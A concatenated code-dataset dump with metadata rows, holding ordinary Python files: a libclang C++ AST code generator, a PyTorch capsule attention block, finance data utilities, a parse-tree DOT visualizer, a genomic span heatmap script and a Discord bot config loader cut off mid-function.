tpl.format(indent=' ' * indent, kind=k.name, name=name, type_name=type_name)
)
saw[str(node.hash)] += 1
# FIXME: skip auto generated decls
skip = len([c for c in node.get_children() if indent == 0 and is_std_ns(c)])
for c in node.get_children():
if indent == 0 and is_std_ns(c):
skip -= 1
if skip == 0:
dump_ast(
c,
indent + base_indent,
saw,
base_indent,
include_refs,
include_ref_depth - 1,
)
if include_refs and include_ref_depth > 0 and is_reference_node(node):
ch = node.get_definition()
if ch is not None:
dump_ast(
ch,
indent + base_indent,
saw,
base_indent,
include_refs,
include_ref_depth - 1,
)
saw[str(node.hash)] -= 1
class ParseOption:
Default = 0x0
DetailedPreprocessingRecord = 0x01
Incomplete = 0x02
PrecompiledPreamble = 0x04
CacheCompletionResults = 0x08
ForSerialization = 0x10
CXXChainedPCH = 0x20
SkipFunctionBodies = 0x40
IncludeBriefCommentsInCodeCompletion = 0x80
CreatePreambleOnFirstParse = 0x100
KeepGoing = 0x200
SingleFileParse = 0x400
LimitSkipFunctionBodiesToPreamble = 0x800
IncludeAttributedTypes = 0x1000
VisitImplicitAttributes = 0x2000
IgnoreNonErrorsFromIncludedFiles = 0x4000
RetainExcludedConditionalBlocks = 0x8000
###############################################################################
#
# AST utils
#
def check_serialize_attribute(node):
for child in node.get_children():
if child.kind == CursorKind.ANNOTATE_ATTR:
for attr_kind in [
'vineyard',
'vineyard(streamable)',
'shared',
'distributed',
]:
if child.spelling.startswith(attr_kind):
return child.spelling
return None
def check_if_class_definition(node):
for child in node.get_children():
if child.kind in [
CursorKind.CXX_BASE_SPECIFIER,
CursorKind.CXX_ACCESS_SPEC_DECL,
CursorKind.CXX_METHOD,
CursorKind.FIELD_DECL,
]:
return True
return False
def filter_the_module(root, filepath):
children = []
for child in root.get_children():
if (
child.location
and child.location.file
and child.location.file.name == filepath
):
children.append(child)
return children
def traverse(node, to_reflect, to_include, namespaces=None):
'''Traverse the AST tree.'''
if node.kind in [
CursorKind.CLASS_DECL,
CursorKind.CLASS_TEMPLATE,
CursorKind.STRUCT_DECL,
]:
# codegen for all top-level classes (definitions, not declarations) in
# the given file.
if check_if_class_definition(node):
attribute = check_serialize_attribute(node)
if attribute in ['vineyard', 'vineyard(streamable)']:
to_reflect.append((attribute, namespaces, node))
if node.kind == CursorKind.INCLUSION_DIRECTIVE:
to_include.append(node)
if node.kind in [CursorKind.TRANSLATION_UNIT, CursorKind.NAMESPACE]:
if node.kind == CursorKind.NAMESPACE:
if namespaces is None:
namespaces = []
else:
namespaces = copy.copy(namespaces)
namespaces.append(node.spelling)
for child in node.get_children():
traverse(child, to_reflect, to_include, namespaces=namespaces)
def find_fields(definition):
fields, using_alias, first_mmeber_offset, has_post_construct = [], [], -1, False
for child in definition.get_children():
if first_mmeber_offset == -1:
if child.kind not in [
CursorKind.TEMPLATE_TYPE_PARAMETER,
CursorKind.CXX_BASE_SPECIFIER,
CursorKind.ANNOTATE_ATTR,
]:
first_mmeber_offset = child.extent.start.offset
if child.kind == CursorKind.FIELD_DECL:
attribute = check_serialize_attribute(child)
if attribute in ['shared', 'distributed']:
fields.append(child)
continue
if child.kind == CursorKind.CXX_METHOD:
attribute = check_serialize_attribute(child)
if attribute == 'distributed':
raise ValueError(
'The annotation "[[distributed]]" is not allowed on methods'
)
if attribute == 'shared':
fields.append(child)
if not has_post_construct and child.spelling == 'PostConstruct':
for body in child.get_children():
if body.kind == CursorKind.CXX_OVERRIDE_ATTR:
has_post_construct = True
break
continue
if child.kind == CursorKind.TYPE_ALIAS_DECL:
using_alias.append((child.spelling, child.extent))
continue
return fields, using_alias, first_mmeber_offset, has_post_construct
def find_distributed_field(definitions: List["CursorKind"]) -> "CursorKind":
fields = []
for child in definitions:
if child.kind == CursorKind.FIELD_DECL:
attribute = check_serialize_attribute(child)
if attribute in ['distributed']:
fields.append(child)
if len(fields) == 0:
return None
if len(fields) == 1:
return fields[0]
raise ValueError(
'A distributed object can only have at most one distributed member '
'(annotated with "[[distributed]]"'
)
def split_members_and_methods(fields):
members, methods = [], []
for field in fields:
if field.kind == CursorKind.FIELD_DECL:
members.append(field)
elif field.kind == CursorKind.CXX_METHOD:
methods.append(field)
else:
raise ValueError('Unknown field kind: %s' % field)
return members, methods
def check_class(node):
template_parameters = []
for child in node.get_children():
if child.kind == CursorKind.TEMPLATE_TYPE_PARAMETER:
template_parameters.append((child.spelling, child.extent))
return node.spelling, template_parameters
def generate_template_header(ts):
if not ts:
return ''
ps = []
for t in ts:
if t.startswith('typename'):
ps.append(t)
else:
ps.append('typename %s' % t)
return 'template<{ps}>'.format(ps=', '.join(ps))
def generate_template_type(name, ts):
if not ts:
return name
return '{name}<{ps}>'.format(name=name, ps=', '.join(ts))
def parse_compilation_database(build_directory):
if build_directory is None:
return None
# check if the file exists first to suppress the clang warning.
compile_commands_json = os.path.join(build_directory, 'compile_commands.json')
if not os.path.isfile(compile_commands_json) or not os.access(
compile_commands_json, os.R_OK
):
return None
try:
return cindex.CompilationDatabase.fromDirectory(build_directory)
except cindex.CompilationDatabaseError:
return None
def validate_and_strip_input_file(source):
if not os.path.isfile(source) or not os.access(source, os.R_OK):
return None, 'File not exists'
with open(source, 'r', encoding='utf-8') as fp:
content = fp.read().splitlines(keepends=False)
# pass(TODO): valid and remove the first line
content = '\n'.join(content)
# pass: rewrite `[[...]]` with `__attribute__((annotate(...)))`
attributes = ['vineyard', 'vineyard(streamable)', 'shared', 'distributed']
for attr in attributes:
content = content.replace(
'[[%s]]' % attr, '__attribute__((annotate("%s")))' % attr
)
return content, ''
def strip_flags(flags):
stripped_flags = []
for flag in flags:
if flag == '-c' or flag.startswith('-O') or flags == '-Werror':
continue
stripped_flags.append(flag)
return stripped_flags
def resolve_include(inc_node, system_includes, includes):
inc_name = inc_node.spelling
if not inc_name.endswith('.vineyard.h'): # os.path.splitext won't work
return None
mod_name = inc_name[: -len(".vineyard.h")] + ".vineyard-mod"
for inc in itertools.chain(system_includes, includes):
target = os.path.join(inc, mod_name)
if os.path.isfile(target) and os.access(target, os.R_OK):
return os.path.join(inc, inc_name)
return None
def generate_parsing_flags(
source,
system_includes=None,
includes=None,
extra_flags=None,
build_directory=None,
delayed=True,
):
# NB:
# `-nostdinc` and `-nostdinc++`: to avoid libclang find an incorrect
# gcc installation.
# `-Wunused-private-field`: we skip parsing the function bodies.
base_flags = [
'-x',
'c++',
'-std=c++14',
'-nostdinc',
'-nostdinc++',
'-D__VPP=1',
]
warning_flags = [
'-Wno-unused-function',
'-Wno-unused-parameter',
'-Wno-unused-private-field',
'-Wno-unknown-warning-option',
]
# prepare flags
flags = None
compliation_db = parse_compilation_database(build_directory)
if compliation_db is not None:
commands = compliation_db.getCompileCommands(source)
if commands is not None and len(commands) > 0:
# strip flags
flags = strip_flags(list(commands[0].arguments)[1:-1])
# adapts to libclang v14.0.1
if flags and flags[-1] == '--':
flags.pop(-1)
# NB: even use compilation database we still needs to include the
# system includes, since we `-nostdinc{++}`.
if system_includes:
for inc in system_includes.split(';'):
flags.append('-isystem')
flags.append(inc)
if extra_flags:
flags.extend(extra_flags)
if flags is None:
flags = []
if system_includes:
for inc in system_includes.split(';'):
flags.append('-isystem')
flags.append(inc)
if includes:
for inc in includes.split(';'):
flags.append('-I%s' % inc)
if extra_flags:
flags.extend(extra_flags)
if delayed:
flags.append('-fdelayed-template-parsing')
else:
flags.append('-fno-delayed-template-parsing')
return base_flags + flags + warning_flags
def parse_module( # noqa: C901
root_directory,
source,
target=None,
system_includes=None,
includes=None,
extra_flags=None,
build_directory=None,
delayed=True,
parse_only=True,
verbose=False,
):
# prepare inputs
content, message = validate_and_strip_input_file(source)
if content is None:
raise RuntimeError('Invalid input: %s' % message)
unsaved_files = [(source, content)]
# parse
index = cindex.Index.create()
options = (
ParseOption.Default
| ParseOption.DetailedPreprocessingRecord
| ParseOption.SkipFunctionBodies
| ParseOption.IncludeAttributedTypes
| ParseOption.KeepGoing
)
parse_flags = generate_parsing_flags(
source,
system_includes=system_includes,
includes=includes,
extra_flags=extra_flags,
build_directory=build_directory,
delayed=delayed,
)
if parse_only:
options |= ParseOption.SingleFileParse
unit = index.parse(
source, unsaved_files=unsaved_files, args=parse_flags, options=options
)
if not parse_only:
for diag in unit.diagnostics:
if verbose or (
diag.location
and diag.location.file
and diag.location.file.name == source
):
logging.warning(diag)
# traverse
modules = filter_the_module(unit.cursor, source)
to_reflect, to_include = [], []
for module in modules:
if verbose:
dump_ast(module)
traverse(module, to_reflect, to_include)
return content, to_reflect, to_include, parse_flags
def parse_deps(
root_directory,
source,
target=None,
system_includes=None,
includes=None,
extra_flags=None,
build_directory=None,
delayed=True,
verbose=False,
):
_, _, to_include, parse_flags = parse_module(
root_directory=root_directory,
source=source,
target=target,
system_includes=system_includes,
includes=includes,
extra_flags=extra_flags,
build_directory=build_directory,
delayed=delayed,
parse_only=True,
verbose=verbose,
)
logging.info('Generating for %s ...', os.path.basename(source))
# analyze include directories from parse flags
i, include_in_flags = 0, []
while i < len(parse_flags):
if parse_flags[i].startswith('-I'):
if parse_flags[i][2:]:
include_in_flags.append(parse_flags[i][2:])
else:
include_in_flags.append(parse_flags[i + 1])
i += 1
if parse_flags[i] == '-isystem':
include_in_flags.append(parse_flags[i + 1])
i += 1
i += 1
for inc in to_include:
header = resolve_include(inc, [], include_in_flags)
if header is not None:
print('Depends:%s' % header.strip())
| 30.938065 | 88 | 0.589356 | 2,659 | 23,977 | 5.124107 | 0.163219 | 0.021798 | 0.009908 | 0.007927 | 0.302165 | 0.230459 | 0.195963 | 0.178202 | 0.163743 | 0.13622 | 0 | 0.008521 | 0.304959 | 23,977 | 774 | 89 | 30.978036 | 0.809061 | 0.07795 | 0 | 0.299003 | 0 | 0 | 0.069922 | 0.010683 | 0 | 0 | 0.003622 | 0.001292 | 0 | 1 | 0.05814 | false | 0 | 0.023256 | 0.01495 | 0.214286 | 0.003322 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e6f59b3583ebc06871f63cd872b675f08d814d4 | 2,482 | py | Python | agscaps/layers/attention.py | clementpoiret/3D-AGSCaps | 475eb1915bc1425cebbd0bec36e9096c9c2cb53c | [
"MIT"
] | 1 | 2021-08-30T14:46:42.000Z | 2021-08-30T14:46:42.000Z | agscaps/layers/attention.py | clementpoiret/3D-AGSCaps | 475eb1915bc1425cebbd0bec36e9096c9c2cb53c | [
"MIT"
] | null | null | null | agscaps/layers/attention.py | clementpoiret/3D-AGSCaps | 475eb1915bc1425cebbd0bec36e9096c9c2cb53c | [
"MIT"
] | null | null | null | from einops import rearrange
from torch import nn
from .switchnorm import SwitchNorm3d
class AttentionBlock(nn.Module):
"""
3D Caps Attention Block w/ optional Normalization.
For normalization, it supports:
- `b` for `BatchNorm3d`,
- `s` for `SwitchNorm3d`.
`using_bn` controls SwitchNorm's behavior. It has no effect is
`normalization == "b"`.
SwitchNorm3d comes from:
<https://github.com/switchablenorms/Switchable-Normalization>
"""
def __init__(self,
F_g,
F_l,
F_int,
F_out=1,
normalization=None,
using_bn=False):
super(AttentionBlock, self).__init__()
W_g = [
nn.Conv3d(
F_g,
F_int,
kernel_size=1,
stride=1,
padding=0,
bias=True,
)
]
W_x = [
nn.Conv3d(
F_l,
F_int,
kernel_size=1,
stride=1,
padding=0,
bias=True,
)
]
psi = [
nn.Conv3d(
F_int,
F_out,
kernel_size=1,
stride=1,
padding=0,
bias=True,
)
]
if normalization == "b":
W_g.append(nn.BatchNorm3d(F_int))
W_x.append(nn.BatchNorm3d(F_int))
psi.append(nn.BatchNorm3d(F_out))
elif normalization == "s":
W_g.append(SwitchNorm3d(F_int, using_bn=using_bn))
W_x.append(SwitchNorm3d(F_int, using_bn=using_bn))
psi.append(SwitchNorm3d(F_out, using_bn=using_bn))
self.W_g = nn.Sequential(*W_g)
self.W_x = nn.Sequential(*W_x)
psi.append(nn.Sigmoid())
self.psi = nn.Sequential(*psi)
self.relu = nn.ReLU(inplace=True)
def forward(self, x, g):
# Reshaping
# g & x should normally have the same shape here
# I don't think we should be more specific right now.
g1 = self.W_g(rearrange(g, "b c a h w d -> b (c a) h w d"))
x1 = self.W_x(rearrange(x, "b c a h w d -> b (c a) h w d"))
psi = self.relu(g1 + x1)
psi = self.psi(psi)
# Unsqueeze to match capsule dimension
psi = rearrange(psi, "b a h w d -> b 1 a h w d")
out = x * psi
return out
| 26.978261 | 67 | 0.487107 | 305 | 2,482 | 3.809836 | 0.321311 | 0.048193 | 0.015491 | 0.020654 | 0.22117 | 0.177281 | 0.177281 | 0.177281 | 0.115318 | 0.086059 | 0 | 0.019877 | 0.412168 | 2,482 | 91 | 68 | 27.274725 | 0.776559 | 0.183723 | 0 | 0.365079 | 0 | 0 | 0.041519 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031746 | false | 0 | 0.047619 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e73d1d5556ab04d773f69a0f3d3e8c3476ff40d | 2,199 | py | Python | alphamind/data/engines/utilities.py | atefar2/alpha-mind | 66d839affb5d81d31d5cac7e5e224278e3f99a8b | [
"MIT"
] | 1 | 2020-05-18T20:57:25.000Z | 2020-05-18T20:57:25.000Z | alphamind/data/engines/utilities.py | atefar2/alpha-mind | 66d839affb5d81d31d5cac7e5e224278e3f99a8b | [
"MIT"
] | null | null | null | alphamind/data/engines/utilities.py | atefar2/alpha-mind | 66d839affb5d81d31d5cac7e5e224278e3f99a8b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on 2017-12-25
@author: cheng.li
"""
from typing import Dict
from typing import Iterable
from alphamind.data.dbmodel.models import Categories
from alphamind.data.dbmodel.models import Market
from alphamind.data.dbmodel.models import RiskCovDay
from alphamind.data.dbmodel.models import RiskCovLong
from alphamind.data.dbmodel.models import RiskCovShort
from alphamind.data.dbmodel.models import RiskExposure
from alphamind.data.dbmodel.models import SpecificRiskDay
from alphamind.data.dbmodel.models import SpecificRiskLong
from alphamind.data.dbmodel.models import SpecificRiskShort
from alphamind.data.dbmodel.models import Uqer
from alphamind.data.engines.industries import INDUSTRY_MAPPING
factor_tables = [Market, RiskExposure, Uqer, Categories]
def _map_risk_model_table(risk_model: str) -> tuple:
if risk_model == 'day':
return RiskCovDay, SpecificRiskDay
elif risk_model == 'short':
return RiskCovShort, SpecificRiskShort
elif risk_model == 'long':
return RiskCovLong, SpecificRiskLong
else:
raise ValueError("risk model name {0} is not recognized".format(risk_model))
def _map_factors(factors: Iterable[str], used_factor_tables) -> Dict:
factor_cols = {}
factors = set(factors).difference({'trade_date', 'code', 'isOpen'})
to_keep = factors.copy()
for f in factors:
for t in used_factor_tables:
if f in t.__table__.columns:
factor_cols[t.__table__.columns[f]] = t
to_keep.remove(f)
break
if to_keep:
raise ValueError("factors in <{0}> can't be find".format(to_keep))
return factor_cols
def _map_industry_category(category: str) -> str:
if category == 'sw':
return '申万行业分类'
elif category == 'sw_adj':
return '申万行业分类修订'
elif category == 'zz':
return '中证行业分类'
elif category == 'dx':
return '东兴行业分类'
elif category == 'zjh':
return '证监会行业V2012'
else:
raise ValueError("No other industry is supported at the current time")
def industry_list(category: str, level: int = 1) -> list:
return INDUSTRY_MAPPING[category][level]
| 30.971831 | 84 | 0.701228 | 275 | 2,199 | 5.465455 | 0.370909 | 0.095143 | 0.124418 | 0.159681 | 0.239521 | 0.239521 | 0 | 0 | 0 | 0 | 0 | 0.009122 | 0.202365 | 2,199 | 70 | 85 | 31.414286 | 0.847777 | 0.028649 | 0 | 0.039216 | 0 | 0 | 0.093985 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078431 | false | 0 | 0.254902 | 0.019608 | 0.529412 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e765dd615cf6bdf3b7653fede443774c268c114 | 5,307 | py | Python | part7/python/genptdot.py | fazillatheef/lsbasi | 07e1a14516156a21ebe2d82e0bae4bba5ad73dd6 | [
"MIT"
] | 1,682 | 2015-06-15T11:42:03.000Z | 2022-03-29T12:40:35.000Z | part7/python/genptdot.py | fazillatheef/lsbasi | 07e1a14516156a21ebe2d82e0bae4bba5ad73dd6 | [
"MIT"
] | 10 | 2017-06-22T11:35:21.000Z | 2022-02-26T17:37:42.000Z | part7/python/genptdot.py | fazillatheef/lsbasi | 07e1a14516156a21ebe2d82e0bae4bba5ad73dd6 | [
"MIT"
] | 493 | 2015-07-05T09:05:09.000Z | 2022-03-28T03:33:33.000Z | ###############################################################################
# #
# Parse Tree visualizer #
# #
# To generate an image from the DOT file run: #
# $ dot -Tpng -o parsetree.png parsetree.dot #
# #
###############################################################################
import argparse
import textwrap
from spi import PLUS, MINUS, MUL, DIV, INTEGER, LPAREN, RPAREN, Lexer
class Node(object):
def __init__(self, name):
self.name = name
self.children = []
def add(self, node):
self.children.append(node)
class RuleNode(Node):
pass
class TokenNode(Node):
pass
class Parser(object):
"""Parses the input and builds a parse tree."""
def __init__(self, lexer):
self.lexer = lexer
# set current token to the first token taken from the input
self.current_token = self.lexer.get_next_token()
# Parse tree root
self.root = None
self.current_node = None
def error(self):
raise Exception('Invalid syntax')
def eat(self, token_type):
# compare the current token type with the passed token
# type and if they match then "eat" the current token
# and assign the next token to the self.current_token,
# otherwise raise an exception.
if self.current_token.type == token_type:
self.current_node.add(TokenNode(self.current_token.value))
self.current_token = self.lexer.get_next_token()
else:
self.error()
def factor(self):
"""factor : INTEGER | LPAREN expr RPAREN"""
node = RuleNode('factor')
self.current_node.add(node)
_save = self.current_node
self.current_node = node
token = self.current_token
if token.type == INTEGER:
self.eat(INTEGER)
elif token.type == LPAREN:
self.eat(LPAREN)
self.expr()
self.eat(RPAREN)
self.current_node = _save
def term(self):
"""term : factor ((MUL | DIV) factor)*"""
node = RuleNode('term')
self.current_node.add(node)
_save = self.current_node
self.current_node = node
self.factor()
while self.current_token.type in (MUL, DIV):
token = self.current_token
if token.type == MUL:
self.eat(MUL)
elif token.type == DIV:
self.eat(DIV)
self.factor()
self.current_node = _save
def expr(self):
"""
expr : term ((PLUS | MINUS) term)*
term : factor ((MUL | DIV) factor)*
factor : INTEGER | LPAREN expr RPAREN
"""
node = RuleNode('expr')
if self.root is None:
self.root = node
else:
self.current_node.add(node)
_save = self.current_node
self.current_node = node
self.term()
while self.current_token.type in (PLUS, MINUS):
token = self.current_token
if token.type == PLUS:
self.eat(PLUS)
elif token.type == MINUS:
self.eat(MINUS)
self.term()
self.current_node = _save
def parse(self):
self.expr()
return self.root
class ParseTreeVisualizer(object):
def __init__(self, parser):
self.parser = parser
self.ncount = 1
self.dot_header = [textwrap.dedent("""\
digraph astgraph {
node [shape=none, fontsize=12, fontname="Courier", height=.1];
ranksep=.3;
edge [arrowsize=.5]
""")]
self.dot_body = []
self.dot_footer = ['}']
def bfs(self, node):
ncount = 1
queue = []
queue.append(node)
s = ' node{} [label="{}"]\n'.format(ncount, node.name)
self.dot_body.append(s)
node._num = ncount
ncount += 1
while queue:
node = queue.pop(0)
for child_node in node.children:
s = ' node{} [label="{}"]\n'.format(ncount, child_node.name)
self.dot_body.append(s)
child_node._num = ncount
ncount += 1
s = ' node{} -> node{}\n'.format(node._num, child_node._num)
self.dot_body.append(s)
queue.append(child_node)
def gendot(self):
tree = self.parser.parse()
self.bfs(tree)
return ''.join(self.dot_header + self.dot_body + self.dot_footer)
def main():
argparser = argparse.ArgumentParser(
description='Generate a Parse Tree DOT file.'
)
argparser.add_argument(
'text',
help='Arithmetic expression (in quotes): "1 + 2 * 3"'
)
args = argparser.parse_args()
text = args.text
lexer = Lexer(text)
parser = Parser(lexer)
viz = ParseTreeVisualizer(parser)
content = viz.gendot()
print(content)
if __name__ == '__main__':
main()
| 28.079365 | 79 | 0.502355 | 564 | 5,307 | 4.592199 | 0.23227 | 0.101931 | 0.081081 | 0.027799 | 0.314286 | 0.249421 | 0.210811 | 0.101158 | 0.072587 | 0.072587 | 0 | 0.003869 | 0.366874 | 5,307 | 188 | 80 | 28.228723 | 0.766964 | 0.179574 | 0 | 0.256 | 0 | 0 | 0.084142 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.104 | false | 0.016 | 0.024 | 0 | 0.184 | 0.008 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e7a0058fbea491f699fa61765f3d5eee1324b52 | 2,228 | py | Python | scripts/span_analysis.py | bruhad-dave/Contextualize-SNVs | 0375ac69c0812e3bde079911e42c3b57cb7fe63d | [
"MIT"
] | null | null | null | scripts/span_analysis.py | bruhad-dave/Contextualize-SNVs | 0375ac69c0812e3bde079911e42c3b57cb7fe63d | [
"MIT"
] | null | null | null | scripts/span_analysis.py | bruhad-dave/Contextualize-SNVs | 0375ac69c0812e3bde079911e42c3b57cb7fe63d | [
"MIT"
] | null | null | null | ## importing
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
import argparse
import os
## parsing arguments
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--infile", help="Input file containing SNV data")
parser.add_argument("-s", "--sample", help="The name of the sample (will be applied to any output files)")
parser.add_argument("-o", "--outpath", help="Folder where output heatmaps will be generated")
args = parser.parse_args()
sample = args.sample
infile = args.infile
outpath = args.outpath
out = os.path.abspath(outpath)
spans = pd.read_csv(infile, sep="\t", header=None)
#print(spans.head(5))
loci = []
nuc = []
for i in spans[0]:
if (">") in i:
loci.append(i)
else:
nuc.append(i)
print(len(loci))
print(len(nuc))
## this function extracts flanks and outputs them in workable format (focal nucleotide:left flank-right flank)
def typify(s):
mid_index = int((len(s)-1)/2)
focal = s[mid_index]
front = s[0:mid_index]
back = s[(mid_index+1):]
return(focal+":"+front+"-"+back)
span_dict = dict(zip(loci, nuc))
#print(span_dict)
span_df = pd.DataFrame.from_dict(span_dict, orient="index")
span_df.reset_index(inplace=True)
span_df.columns = ["Coordinate", "Span"]
#print(span_df.head(5))
span_df["Focal:Flank"] = span_df.apply(lambda row : typify(row["Span"]), axis = 1)
delt, flank = np.unique(span_df["Focal:Flank"], return_counts= True)
del_dict = dict(zip(delt, flank))
#print(span_df.head(5))
#print(del_dict)
del_df = pd.DataFrame.from_dict(del_dict, orient="index")
del_df.reset_index(inplace=True)
del_df.columns = ["Focal:Flank", "Count"]
#print(del_df.head(5))
del_df[["Focal", "Flank"]] = del_df["Focal:Flank"].str.split(":", n = 1, expand = True)
#print(del_df.head(5))
## plotting
ax = plt.axes()
ax.set_facecolor("cornflowerblue")
subset = del_df[del_df["Count"] >= 150]
sub_map = subset.pivot("Flank", "Focal", "Count")
sns.heatmap(sub_map, vmin=0, vmax=800, linewidths=.5, cmap = "icefire", annot=True, fmt="n", annot_kws={"fontsize":6}, yticklabels=1)
plt.savefig(out+"/"+sample+"_spans.svg", format="svg")
plt.savefig(out+"/"+sample+"_spans.png", format="png")
#plt.show()
## done, hopefully
| 30.108108 | 133 | 0.694794 | 351 | 2,228 | 4.287749 | 0.424501 | 0.0299 | 0.018605 | 0.022591 | 0.131561 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011265 | 0.123429 | 2,228 | 73 | 134 | 30.520548 | 0.759345 | 0.137792 | 0 | 0 | 0 | 0 | 0.177708 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.020408 | false | 0 | 0.122449 | 0 | 0.142857 | 0.040816 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e7bf95ea5c820bd05ddb3b99a7d3a87403fd019 | 3,877 | py | Python | environment.py | dldhk97/UtilityBot | e49e70c27c824506cac4b146f43b421606d02ec5 | [
"MIT"
] | null | null | null | environment.py | dldhk97/UtilityBot | e49e70c27c824506cac4b146f43b421606d02ec5 | [
"MIT"
] | null | null | null | environment.py | dldhk97/UtilityBot | e49e70c27c824506cac4b146f43b421606d02ec5 | [
"MIT"
] | null | null | null | import os
import sys
from dotenv import load_dotenv
# TODO : 리눅스, win32 타겟별 세팅.
# TODO : 파이썬 버전별 세팅 3.5 ~ 3.8?
def load_env():
load_dotenv() # load bot environment
bot_env = BotEnv.instance()
bot_env.env_initialize('BOT_TOKEN')
bot_env.env_initialize('PREFIX')
bot_env.env_initialize('OWNER_ID')
bot_env.env_initialize('USE_GAMIE_MODE')
bot_env.env_initialize('USE_GAMIE_REACTION_MODE')
bot_env.env_initialize('GAMIE_EMOJI', True)
bot_env.env_initialize('USE_SPOILER_REACTION_MODE')
bot_env.env_initialize('SPOILER_MENTION')
bot_env.env_initialize('SPOILER_REACTION_EMOJI', True)
bot_env.env_initialize('UNSPOILER_REACTION_EMOJI', True)
bot_env.env_initialize('MOVE_MENTION')
bot_env.env_initialize('USE_IMPORTANT_CHANNEL_REACTION_MODE')
bot_env.env_initialize('IMPORTANT_CHANNEL_ID')
bot_env.env_initialize('IMPORTANT_CHANNEL_REACTION_EMOJI', True)
bot_env.env_initialize('USE_TRASH_CHANNEL_REACTION_MODE')
bot_env.env_initialize('TRASH_CHANNEL_ID')
bot_env.env_initialize('TRASH_CHANNEL_REACTION_EMOJI', True)
_env_none_check('BOT_TOKEN', '봇 토큰이 없습니다.')
_env_none_check('PREFIX', 'PREFIX가 없습니다.')
_env_none_check('OWNER_ID', '관리자 ID가 없습니다.')
if bot_env.get_env('USE_GAMIE_MODE'):
_env_none_check('GAMIE_EMOJI', '개미 옵션이 켜져있지만, 개미 이모지가 설정되어있지 않습니다.')
if bot_env.get_env('USE_GAMIE_REACTION_MODE'):
_env_none_check('GAMIE_EMOJI', '개미 리액션 옵션이 켜져있지만, 개미 이모지가 설정되어있지 않습니다.')
bot_env._reaction_emojies.append('GAMIE_EMOJI')
if bot_env.get_env('USE_SPOILER_REACTION_MODE'):
_env_none_check('SPOILER_REACTION_EMOJI', '스포일러 옵션이 켜져있지만, 스포일러 이모지가 설정되어있지 않습니다.')
_env_none_check('UNSPOILER_REACTION_EMOJI', '스포일러 옵션이 켜져있지만, 언스포일러 이모지가 설정되어있지 않습니다.')
bot_env._reaction_emojies.append('SPOILER_REACTION_EMOJI')
bot_env._reaction_emojies.append('UNSPOILER_REACTION_EMOJI')
if bot_env.get_env('USE_IMPORTANT_CHANNEL_REACTION_MODE'):
_env_none_check('IMPORTANT_CHANNEL_ID', '중요 채널 리액션 이동 모드가 켜져있지만, 채널 ID가 설정되어있지 않습니다.')
_env_none_check('IMPORTANT_CHANNEL_REACTION_EMOJI', '중요 채널 리액션 이동 모드가 켜져있지만, 리액션 이모지가 설정되어있지 않습니다.')
bot_env._reaction_emojies.append('IMPORTANT_CHANNEL_REACTION_EMOJI')
if bot_env.get_env('USE_TRASH_CHANNEL_REACTION_MODE'):
_env_none_check('TRASH_CHANNEL_ID', '휴지통 채널 리액션 모드가 켜져있지만, 채널 ID가 설정되어있지 않습니다.')
_env_none_check('TRASH_CHANNEL_REACTION_EMOJI', '휴지통 채널 리액션 모드가 켜져있지만, 리액션 이모지가 설정되어있지 않습니다.')
bot_env._reaction_emojies.append('TRASH_CHANNEL_REACTION_EMOJI')
def _env_none_check(key, error_msg):
if not BotEnv.instance().get_env(key):
raise Exception(error_msg)
def _emoji_convert(src):
src = src.replace('+', '')
if '1F' in src:
src = '\\U000' + src[1:]
else:
src = '\\u' + src[1:]
src = src.encode("latin_1").decode("raw_unicode_escape").encode('utf-16', 'surrogatepass').decode('utf-16')
return src
class BotEnv():
_instance = None
@classmethod
def _getInstance(cls):
return cls._instance
@classmethod
def instance(cls, *args, **kargs):
cls._instance = cls(*args, **kargs)
cls.instance = cls._getInstance
return cls._instance
def __init__(self):
self._env = {}
self._reaction_emojies = []
def set_env(self, key, value):
if value == 'True':
value = True
elif value == 'False':
value = False
self._env[key] = value
# get env arg from .env file
def env_initialize(self, key, is_emoji=False):
arg = os.getenv(key)
if is_emoji:
arg = _emoji_convert(arg)
if arg is None:
arg = False
BotEnv.instance().set_env(key, arg)
def get_env(self, key):
